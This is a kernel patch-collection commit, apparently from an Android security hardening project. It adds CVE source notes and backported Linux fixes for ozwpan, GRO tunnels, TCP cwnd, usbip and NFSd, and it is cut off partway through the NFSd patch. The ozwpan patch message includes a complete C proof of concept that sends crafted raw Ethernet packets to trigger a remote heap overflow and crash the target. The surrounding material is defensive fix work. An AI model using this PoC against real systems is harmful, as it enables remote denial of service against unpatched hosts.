Add more patches

Tad 2017-11-08 03:23:39 -05:00
parent 397e66c977
commit aaa94329a5
8 changed files with 814 additions and 1 deletion


@@ -2,8 +2,18 @@
 # https://source.android.com/security/bulletin
 # https://cve.lineageos.org
 # https://www.codeaurora.org/security-advisories
-# https://github.com/google/syzkaller/tree/master/docs/linux
+# https://www.codeaurora.org/security-advisories/security-bulletins
+# https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md
 # + some extras
+#To Do
+# Make another pass through LineageOS CVE tracker for more patch versions
+#To add
+# https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs.md
+# https://www.codeaurora.org/security-advisory/uncontrolled-memory-mapping-in-camera-driver-cve-2013-2595
+# https://www.codeaurora.org/security-advisory/multiple-issues-in-camera-drivers-cve-2014-9410-cve-2015-0568
+# https://portland.source.codeaurora.org/patches/quic/la/
+#The 'Untracked' folder contains patches from the following sources
+# https://portland.source.codeaurora.org/patches/quic/la/CVE-fixes-patches.zip
 CVE-2012-4220
 Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=32682d16fb46a60a7952c4d9e0653602ff674e4b
 CVE-2012-4221


@@ -0,0 +1,220 @@
From 39a4e1c2675ab45cec548a99ad770faa769ee27a Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Mon, 29 May 2017 12:36:54 +0530
Subject: ozwpan: Use unsigned ints to prevent heap overflow
[ Upstream commit: b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c ]
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution. This is remotely triggerable with a magic packet.
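A minimal sketch of the arithmetic (illustrative values, not taken from a
real packet): copy_len is computed as a signed difference, and memcpy()
takes a size_t, so a negative length wraps to an enormous one.

#include <stdio.h>

int main(void)
{
        int required_size = 2;  /* urb->transfer_buffer_length */
        int offset = 4;         /* network-supplied, larger than required_size */
        int copy_len = required_size - offset;  /* -2 */
        /* as a size_t argument to memcpy(), -2 becomes SIZE_MAX - 1: */
        printf("%zu\n", (size_t)copy_len);
        return 0;
}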
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
/* Headers and kernel-style type shims the PoC needs to build in userspace.
 * These are restored here and assumed: the listing as archived starts at
 * hex2num() below. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/ethernet.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <endian.h>
#include <linux/if_packet.h>

#define u8  uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"    /* shipped with the ozwpan module, as noted above */

static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Change-Id: Ibc1a8b7baa06332b2a7fe7135c68faee1bd791d9
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
drivers/staging/ozwpan/ozhcd.c | 8 ++++----
drivers/staging/ozwpan/ozusbif.h | 4 ++--
2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/drivers/staging/ozwpan/ozhcd.c b/drivers/staging/ozwpan/ozhcd.c
index e880452..628e4e2 100644
--- a/drivers/staging/ozwpan/ozhcd.c
+++ b/drivers/staging/ozwpan/ozhcd.c
@@ -746,8 +746,8 @@ void oz_hcd_pd_reset(void *hpd, void *hport)
/*
* Context: softirq
*/
-void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc,
- int length, int offset, int total_size)
+void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, const u8 *desc,
+ u8 length, u16 offset, u16 total_size)
{
struct oz_port *port = (struct oz_port *)hport;
struct urb *urb;
@@ -759,8 +759,8 @@ void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc,
if (!urb)
return;
if (status == 0) {
- int copy_len;
- int required_size = urb->transfer_buffer_length;
+ unsigned int copy_len;
+ unsigned int required_size = urb->transfer_buffer_length;
if (required_size > total_size)
required_size = total_size;
diff --git a/drivers/staging/ozwpan/ozusbif.h b/drivers/staging/ozwpan/ozusbif.h
index 4249fa3..d2a6085 100644
--- a/drivers/staging/ozwpan/ozusbif.h
+++ b/drivers/staging/ozwpan/ozusbif.h
@@ -29,8 +29,8 @@ void oz_usb_request_heartbeat(void *hpd);
/* Confirmation functions.
*/
-void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status,
- const u8 *desc, int length, int offset, int total_size);
+void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status,
+ const u8 *desc, u8 length, u16 offset, u16 total_size);
void oz_hcd_control_cnf(void *hport, u8 req_id, u8 rcode,
const u8 *data, int data_len);
--
1.9.1


@@ -0,0 +1,169 @@
From ce7dbf611ba9db087abc984ba1807771fb0c3545 Mon Sep 17 00:00:00 2001
From: Jesse Gross <jesse@kernel.org>
Date: Fri, 26 May 2017 10:43:25 +0530
Subject: tunnels: Don't apply GRO to multiple layers of encapsulation.
[ Upstream commit: fac8e0f579695a3ecbc4d3cac369139d7f819971 ]
When drivers express support for TSO of encapsulated packets, they
only mean that they can do it for one layer of encapsulation.
Supporting additional levels would mean updating, at a minimum,
more IP length fields and they are unaware of this.
No encapsulation device expresses support for handling offloaded
encapsulated packets, so we won't generate these types of frames
in the transmit path. However, GRO doesn't have a check for
multiple levels of encapsulation and will attempt to build them.
UDP tunnel GRO actually does prevent this situation but it only
handles multiple UDP tunnels stacked on top of each other. This
generalizes that solution to prevent any kind of tunnel stacking
that would cause problems.
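The guard this patch adds to each tunnel gro_receive handler reduces to one
pattern (a sketch distilled from the hunks below):

/* the first tunnel layer claims the per-skb mark; a second, stacked
 * layer finds it already set, flushes the skb and skips aggregation */
if (NAPI_GRO_CB(skb)->encap_mark) {
        NAPI_GRO_CB(skb)->flush = 1;
        return NULL;
}
NAPI_GRO_CB(skb)->encap_mark = 1;
return inet_gro_receive(head, skb);     /* or the protocol's own handler */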
Change-Id: I072ec2fec752795bee66cf5464af48f17c837a7f
Signed-off-by: Jesse Gross <jesse@kernel.org>
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
include/linux/netdevice.h | 4 ++--
net/core/dev.c | 2 +-
net/ipv4/af_inet.c | 15 ++++++++++++++-
net/ipv4/gre_offload.c | 5 +++++
net/ipv4/udp_offload.c | 6 +++---
net/ipv6/ip6_offload.c | 15 ++++++++++++++-
6 files changed, 39 insertions(+), 8 deletions(-)
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 943a8301..173b250 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -1902,8 +1902,8 @@ struct napi_gro_cb {
/* Used in ipv6_gro_receive() and foo-over-udp */
u16 proto;
- /* Used in udp_gro_receive */
- u8 udp_mark:1;
+ /* Used in tunnel GRO receive */
+ u8 encap_mark:1;
/* GRO checksum is valid */
u8 csum_valid:1;
diff --git a/net/core/dev.c b/net/core/dev.c
index 9d41179..99e2387 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -4116,7 +4116,7 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff
NAPI_GRO_CB(skb)->same_flow = 0;
NAPI_GRO_CB(skb)->flush = 0;
NAPI_GRO_CB(skb)->free = 0;
- NAPI_GRO_CB(skb)->udp_mark = 0;
+ NAPI_GRO_CB(skb)->encap_mark = 0;
/* Setup for GRO checksum validation */
switch (skb->ip_summed) {
diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
index b39d5ef..5589a7c 100644
--- a/net/ipv4/af_inet.c
+++ b/net/ipv4/af_inet.c
@@ -1420,6 +1420,19 @@ out:
return pp;
}
+static struct sk_buff **ipip_gro_receive(struct sk_buff **head,
+ struct sk_buff *skb)
+{
+ if (NAPI_GRO_CB(skb)->encap_mark) {
+ NAPI_GRO_CB(skb)->flush = 1;
+ return NULL;
+ }
+
+ NAPI_GRO_CB(skb)->encap_mark = 1;
+
+ return inet_gro_receive(head, skb);
+}
+
int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
{
if (sk->sk_family == AF_INET)
@@ -1678,7 +1691,7 @@ static struct packet_offload ip_packet_offload __read_mostly = {
static const struct net_offload ipip_offload = {
.callbacks = {
.gso_segment = inet_gso_segment,
- .gro_receive = inet_gro_receive,
+ .gro_receive = ipip_gro_receive,
.gro_complete = inet_gro_complete,
},
};
diff --git a/net/ipv4/gre_offload.c b/net/ipv4/gre_offload.c
index abc50b4..cc7b082 100644
--- a/net/ipv4/gre_offload.c
+++ b/net/ipv4/gre_offload.c
@@ -128,6 +128,11 @@ static struct sk_buff **gre_gro_receive(struct sk_buff **head,
struct packet_offload *ptype;
__be16 type;
+ if (NAPI_GRO_CB(skb)->encap_mark)
+ goto out;
+
+ NAPI_GRO_CB(skb)->encap_mark = 1;
+
off = skb_gro_offset(skb);
hlen = off + sizeof(*greh);
greh = skb_gro_header_fast(skb, off);
diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
index 6480cea..e6d05ae 100644
--- a/net/ipv4/udp_offload.c
+++ b/net/ipv4/udp_offload.c
@@ -266,14 +266,14 @@ struct sk_buff **udp_gro_receive(struct sk_buff **head, struct sk_buff *skb,
unsigned int off = skb_gro_offset(skb);
int flush = 1;
- if (NAPI_GRO_CB(skb)->udp_mark ||
+ if (NAPI_GRO_CB(skb)->encap_mark ||
(skb->ip_summed != CHECKSUM_PARTIAL &&
NAPI_GRO_CB(skb)->csum_cnt == 0 &&
!NAPI_GRO_CB(skb)->csum_valid))
goto out;
- /* mark that this skb passed once through the udp gro layer */
- NAPI_GRO_CB(skb)->udp_mark = 1;
+ /* mark that this skb passed once through the tunnel gro layer */
+ NAPI_GRO_CB(skb)->encap_mark = 1;
rcu_read_lock();
uo_priv = rcu_dereference(udp_offload_base);
diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c
index dece5c7..dbc528e 100644
--- a/net/ipv6/ip6_offload.c
+++ b/net/ipv6/ip6_offload.c
@@ -255,6 +255,19 @@ out:
return pp;
}
+static struct sk_buff **sit_gro_receive(struct sk_buff **head,
+ struct sk_buff *skb)
+{
+ if (NAPI_GRO_CB(skb)->encap_mark) {
+ NAPI_GRO_CB(skb)->flush = 1;
+ return NULL;
+ }
+
+ NAPI_GRO_CB(skb)->encap_mark = 1;
+
+ return ipv6_gro_receive(head, skb);
+}
+
static int ipv6_gro_complete(struct sk_buff *skb, int nhoff)
{
const struct net_offload *ops;
@@ -289,7 +302,7 @@ static struct packet_offload ipv6_packet_offload __read_mostly = {
static const struct net_offload sit_offload = {
.callbacks = {
.gso_segment = ipv6_gso_segment,
- .gro_receive = ipv6_gro_receive,
+ .gro_receive = sit_gro_receive,
.gro_complete = ipv6_gro_complete,
},
};
--
1.9.1


@@ -0,0 +1,190 @@
From 8a069274d823319273dab097e865faa01bee2451 Mon Sep 17 00:00:00 2001
From: Sabrina Dubroca <sd@queasysnail.net>
Date: Fri, 26 May 2017 15:25:08 +0530
Subject: net: add recursion limit to GRO
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
[ Backported upstream commit: fcd91dd449867c6bfe56a81cabba76b829fd05cd ]
[ Files without GRO support have not been updated ]
Currently, GRO can do unlimited recursion through the gro_receive
handlers. This was fixed for tunneling protocols by limiting tunnel GRO
to one level with encap_mark, but both VLAN and TEB still have this
problem. Thus, the kernel is vulnerable to a stack overflow if we
receive a packet composed entirely of VLAN headers.
This patch adds a recursion counter to the GRO layer to prevent stack
overflow. When a gro_receive function hits the recursion limit, GRO is
aborted for this skb and it is processed normally. This recursion
counter is put in the GRO CB, but could be turned into a percpu counter
if we run out of space in the CB.
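Distilled from the netdevice.h hunk below: every tunnel/VLAN gro_receive
call now goes through a wrapper that bounds the nesting depth (sketch):

#define GRO_RECURSION_LIMIT 15
/* bump the per-skb counter; once the limit is hit, flush the skb and
 * fall back to the normal (non-GRO) receive path */
if (unlikely(++NAPI_GRO_CB(skb)->recursion_counter == GRO_RECURSION_LIMIT)) {
        NAPI_GRO_CB(skb)->flush |= 1;
        return NULL;
}
return cb(head, skb);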
Thanks to Vladimír Beneš <vbenes@redhat.com> for the initial bug report.
Change-Id: Iec7b958d843c5d8214a36be8187d03f9e86ef079
Fixes: CVE-2016-7039
Fixes: 9b174d88c257 ("net: Add Transparent Ethernet Bridging GRO support.")
Fixes: 66e5133f19e9 ("vlan: Add GRO support for non hardware accelerated vlan")
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reviewed-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Acked-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
drivers/net/vxlan.c | 2 +-
include/linux/netdevice.h | 24 ++++++++++++++++++++++++
net/core/dev.c | 1 +
net/ipv4/af_inet.c | 2 +-
net/ipv4/fou.c | 4 ++--
net/ipv4/gre_offload.c | 2 +-
net/ipv4/udp_offload.c | 2 +-
net/ipv6/ip6_offload.c | 2 +-
8 files changed, 32 insertions(+), 7 deletions(-)
diff --git a/drivers/net/vxlan.c b/drivers/net/vxlan.c
index 59282dd..d7cdfad 100644
--- a/drivers/net/vxlan.c
+++ b/drivers/net/vxlan.c
@@ -600,7 +600,7 @@ static struct sk_buff **vxlan_gro_receive(struct sk_buff **head, struct sk_buff
skb_gro_pull(skb, sizeof(*eh)); /* pull inner eth header */
skb_gro_postpull_rcsum(skb, eh, sizeof(*eh));
- pp = ptype->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 173b250..cbcd056 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -1914,6 +1914,11 @@ struct napi_gro_cb {
/* Used in foo-over-udp, set in udp[46]_gro_receive */
u8 is_ipv6:1;
+ /* Number of gro_receive callbacks this packet already went through */
+ u8 recursion_counter:4;
+
+ /* 1 bit hole */
+
/* used to support CHECKSUM_COMPLETE for tunneling protocols */
__wsum csum;
@@ -1923,6 +1928,25 @@ struct napi_gro_cb {
#define NAPI_GRO_CB(skb) ((struct napi_gro_cb *)(skb)->cb)
+#define GRO_RECURSION_LIMIT 15
+static inline int gro_recursion_inc_test(struct sk_buff *skb)
+{
+ return ++NAPI_GRO_CB(skb)->recursion_counter == GRO_RECURSION_LIMIT;
+}
+
+typedef struct sk_buff **(*gro_receive_t)(struct sk_buff **, struct sk_buff *);
+static inline struct sk_buff **call_gro_receive(gro_receive_t cb,
+ struct sk_buff **head,
+ struct sk_buff *skb)
+{
+ if (unlikely(gro_recursion_inc_test(skb))) {
+ NAPI_GRO_CB(skb)->flush |= 1;
+ return NULL;
+ }
+
+ return cb(head, skb);
+}
+
struct packet_type {
__be16 type; /* This is really htons(ether_type). */
struct net_device *dev; /* NULL is wildcarded here */
diff --git a/net/core/dev.c b/net/core/dev.c
index 99e2387..836e4f0 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -4117,6 +4117,7 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff
NAPI_GRO_CB(skb)->flush = 0;
NAPI_GRO_CB(skb)->free = 0;
NAPI_GRO_CB(skb)->encap_mark = 0;
+ NAPI_GRO_CB(skb)->recursion_counter = 0;
/* Setup for GRO checksum validation */
switch (skb->ip_summed) {
diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
index 5589a7c..4fc2ca4 100644
--- a/net/ipv4/af_inet.c
+++ b/net/ipv4/af_inet.c
@@ -1409,7 +1409,7 @@ static struct sk_buff **inet_gro_receive(struct sk_buff **head,
skb_gro_pull(skb, sizeof(*iph));
skb_set_transport_header(skb, skb_gro_offset(skb));
- pp = ops->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
index 8ce8e82..7b5b280 100644
--- a/net/ipv4/fou.c
+++ b/net/ipv4/fou.c
@@ -119,7 +119,7 @@ static struct sk_buff **fou_gro_receive(struct sk_buff **head,
if (!ops || !ops->callbacks.gro_receive)
goto out_unlock;
- pp = ops->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
@@ -220,7 +220,7 @@ static struct sk_buff **gue_gro_receive(struct sk_buff **head,
/* Adjusted NAPI_GRO_CB(skb)->csum after skb_gro_pull()*/
skb_gro_postpull_rcsum(skb, guehdr, guehlen);
- pp = ops->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/net/ipv4/gre_offload.c b/net/ipv4/gre_offload.c
index cc7b082..370c057 100644
--- a/net/ipv4/gre_offload.c
+++ b/net/ipv4/gre_offload.c
@@ -219,7 +219,7 @@ static struct sk_buff **gre_gro_receive(struct sk_buff **head,
/* Adjusted NAPI_GRO_CB(skb)->csum after skb_gro_pull()*/
skb_gro_postpull_rcsum(skb, greh, grehlen);
- pp = ptype->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
index e6d05ae..f805597 100644
--- a/net/ipv4/udp_offload.c
+++ b/net/ipv4/udp_offload.c
@@ -306,7 +306,7 @@ unflush:
skb_gro_pull(skb, sizeof(struct udphdr)); /* pull encapsulating udp header */
skb_gro_postpull_rcsum(skb, uh, sizeof(struct udphdr));
NAPI_GRO_CB(skb)->proto = uo_priv->offload->ipproto;
- pp = uo_priv->offload->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(uo_priv->offload->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c
index dbc528e..b10c0c6 100644
--- a/net/ipv6/ip6_offload.c
+++ b/net/ipv6/ip6_offload.c
@@ -244,7 +244,7 @@ static struct sk_buff **ipv6_gro_receive(struct sk_buff **head,
skb_gro_postpull_rcsum(skb, iph, nlen);
- pp = ops->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
--
1.9.1


@@ -0,0 +1,67 @@
From e1f31f3f20ab760ebb2425e67385b2c593c35be5 Mon Sep 17 00:00:00 2001
From: Yuchung Cheng <ycheng@google.com>
Date: Fri, 26 May 2017 15:45:15 +0530
Subject: tcp: fix zero cwnd in tcp_cwnd_reduction
[ Upstream commit: 8b8a321ff72c785ed5e8b4cf6eda20b35d427390 ]
Patch 3759824da87b ("tcp: PRR uses CRB mode by default and SS mode
conditionally") introduced a bug that cwnd may become 0 when both
inflight and sndcnt are 0 (cwnd = inflight + sndcnt). This may lead
to a div-by-zero if the connection starts another cwnd reduction
phase by setting tp->prior_cwnd to the current cwnd (0) in
tcp_init_cwnd_reduction().
To prevent this we skip PRR operation when nothing is acked or
sacked. Then cwnd must be positive in all cases as long as ssthresh
is positive:
1) The proportional reduction mode
   inflight > ssthresh > 0
2) The reduction bound mode
   a) inflight == ssthresh > 0
   b) inflight < ssthresh
      sndcnt > 0 since newly_acked_sacked > 0 and inflight < ssthresh
Therefore in all cases inflight and sndcnt can not both be 0.
We check invalid tp->prior_cwnd to avoid potential div0 bugs.
In reality this bug is triggered only with a sequence of less common
events. For example, the connection is terminating an ECN-triggered
cwnd reduction with an inflight 0, then it receives reordered/old
ACKs or DSACKs from prior transmission (which acks nothing). Or the
connection is in fast recovery stage that marks everything lost,
but fails to retransmit due to local issues, then receives data
packets from other end which acks nothing.
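A sketch of the failing arithmetic, simplified from tcp_cwnd_reduction()
(the dividend line appears in the hunk below):

/* a prior reduction ended with cwnd = inflight + sndcnt = 0 + 0 = 0;
 * tcp_init_cwnd_reduction() then copies that 0 into tp->prior_cwnd,
 * and PRR divides by it: */
u64 dividend = (u64)tp->snd_ssthresh * tp->prr_delivered + tp->prior_cwnd - 1;
int sndcnt = div_u64(dividend, tp->prior_cwnd); /* div-by-zero when prior_cwnd == 0 */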
Change-Id: I6edbd82492839ca86515c64ee22828f7582900aa
Fixes: 3759824da87b ("tcp: PRR uses CRB mode by default and SS mode conditionally")
Reported-by: Oleksandr Natalenko <oleksandr@natalenko.name>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
net/ipv4/tcp_input.c | 3 +++
1 file changed, 3 insertions(+)
diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index cc7f940..c0be23d 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -2516,6 +2516,9 @@ static void tcp_cwnd_reduction(struct sock *sk, const int prior_unsacked,
int newly_acked_sacked = prior_unsacked -
(tp->packets_out - tp->sacked_out);
+ if (newly_acked_sacked <= 0 || WARN_ON_ONCE(!tp->prior_cwnd))
+ return;
+
tp->prr_delivered += newly_acked_sacked;
if (tcp_packets_in_flight(tp) > tp->snd_ssthresh) {
u64 dividend = (u64)tp->snd_ssthresh * tp->prr_delivered +
--
1.9.1


@@ -0,0 +1,49 @@
From bda1fb82d50ddd35354d850456e687da43bcd794 Mon Sep 17 00:00:00 2001
From: Ignat Korchagin <ignat.korchagin@gmail.com>
Date: Thu, 17 Mar 2016 18:00:29 +0000
Subject: USB: usbip: fix potential out-of-bounds write
Fix potential out-of-bounds write to urb->transfer_buffer
usbip handles network communication directly in the kernel. When receiving a
packet from its peer, usbip code parses headers according to protocol. As
part of this parsing urb->actual_length is filled. Since the input for
urb->actual_length comes from the network, it should be treated as untrusted.
Any entity controlling the network may put any value in the input and the
preallocated urb->transfer_buffer may not be large enough to hold the data.
Thus, the malicious entity is able to write arbitrary data to kernel memory.
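In usbip_recv_xbuff() the untrusted length flows straight into a socket
read over the preallocated buffer; the added bounds check rejects it first
(sketch of the vhci side, simplified):

/* 'size' comes from urb->actual_length, i.e. from the network PDU,
 * so the peer fully controls it */
if (size > urb->transfer_buffer_length)         /* the check this patch adds */
        return -EPIPE;
ret = usbip_recv(ud->tcp_socket, urb->transfer_buffer, size);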
Signed-off-by: Ignat Korchagin <ignat.korchagin@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
(cherry picked from commit b348d7dddb6c4fbfc810b7a0626e8ec9e29f7cbb)
Change-Id: I402ca8adef71745a85ba2c51945b99d46509c06e
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
drivers/usb/usbip/usbip_common.c | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/drivers/usb/usbip/usbip_common.c b/drivers/usb/usbip/usbip_common.c
index facaaf0..e40da77 100644
--- a/drivers/usb/usbip/usbip_common.c
+++ b/drivers/usb/usbip/usbip_common.c
@@ -741,6 +741,17 @@ int usbip_recv_xbuff(struct usbip_device *ud, struct urb *urb)
if (!(size > 0))
return 0;
+ if (size > urb->transfer_buffer_length) {
+ /* should not happen, probably malicious packet */
+ if (ud->side == USBIP_STUB) {
+ usbip_event_add(ud, SDEV_EVENT_ERROR_TCP);
+ return 0;
+ } else {
+ usbip_event_add(ud, VDEV_EVENT_ERROR_TCP);
+ return -EPIPE;
+ }
+ }
+
ret = usbip_recv(ud->tcp_socket, urb->transfer_buffer, size);
if (ret != size) {
dev_err(&urb->dev->dev, "recv xbuf, %d\n", ret);
--
1.9.1


@@ -0,0 +1,107 @@
From fa3cb34c08bd88c37a9cee301e12d440e7354f4b Mon Sep 17 00:00:00 2001
From: "J. Bruce Fields" <bfields@redhat.com>
Date: Fri, 21 Apr 2017 16:10:18 -0400
Subject: nfsd: check for oversized NFSv2/v3 arguments
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
A client can append random data to the end of an NFSv2 or NFSv3 RPC call
without our complaining; we'll just stop parsing at the end of the
expected data and ignore the rest.
Encoded arguments and replies are stored together in an array of pages,
and if a call is too large it could leave inadequate space for the
reply. This is normally OK because NFS RPC's typically have either
short arguments and long replies (like READ) or long arguments and short
replies (like WRITE). But a client that sends an incorrectly long call
can violate those assumptions. This was observed to cause crashes.
Also, several operations increment rq_next_page in the decode routine
before checking the argument size, which can leave rq_next_page pointing
well past the end of the page array, causing trouble later in
svc_free_pages.
So, following a suggestion from Neil Brown, add a central check to
enforce our expectation that no NFSv2/v3 call has both a large call and
a large reply.
As followup we may also want to rewrite the encoding routines to check
more carefully that they aren't running off the end of the page array.
We may also consider rejecting calls that have any extra garbage
appended. That would be safer, and within our rights by spec, but given
the age of our server and the NFS protocol, and the fact that we've
never enforced this before, we may need to balance that against the
possibility of breaking some oddball client.
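Worked through the new nfs_request_too_big() below for two calls (a sketch;
assumes PAGE_SIZE == 4096):

/* NFSv3 WRITE carrying 64 KB of data: pc_xdrressize says the reply is
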